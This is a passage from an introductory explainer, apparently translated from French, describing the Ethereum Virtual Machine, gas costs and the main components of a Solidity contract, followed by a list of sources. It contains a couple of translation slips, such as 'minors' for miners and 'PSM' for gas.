It is the Ethereum Virtual Machine or EVM: this execution environment is isolated from the network and allows to interpret the Solidity code once compiled, in order to guarantee the update of the state of the contracts (and thus of the blockchain), via all the validator nodes of the network. It is the minors who execute these instructions and update the Ethereum blockchain: they are financially rewarded for this. Each instruction of a Solidity contract will thus have an execution cost (in GAS). In order to avoid infinite loops within a program, there is always a limit to the PSM that can be consumed.

**GAS** :
Each time you want to run a smart contract on the Ethereum network, you will have to use computing power. The gas represents the computer work time necessary to carry out such an operation. It is a predefined value, on which the whole network has agreed. By using a certain amount of gas and an associated price per unit of gas, we will have the necessary cost, denominated in ETH, to carry out this type of transaction.
</div>

### The components of Solidity

<div style="text-align: justify">

With Solidity, a contract is defined by different elements:
* **State variables**: they can be of different types and their value is permanently stored in the contract.
* **Functions**: at the heart of the contract code, they will be executed according to the arguments and parameters injected, and will return the desired variables. They can be called internally or externally and their degree of visibility can be defined.
* **Modifiers**: these tools allow to amend the functions of a contract in a declarative way, which is useful to avoid repetitions in the code and gain readability.
* **The events**: they allow to interact with the logging system of the actions carried out by the contract (the "logs" generated by the EVM).
* **The types** allow to define what a variable represents. With Solidity, we can create structs (custom types that can group several variables) and do mapping (indexing variables according to a key -> value system). There are notable differences with other object-oriented languages, especially in the context of mapping.

</div>

## Sources

- https://blog.octo.com/attaque-des-51-sur-une-blockchain-demonstration-sur-ethereum
- https://geth.ethereum.org/docs/interface/private-network
- https://cryptoast.fr/gas/
- https://solidity-fr.readthedocs.io/fr/latest/introduction-to-smart-contracts.html
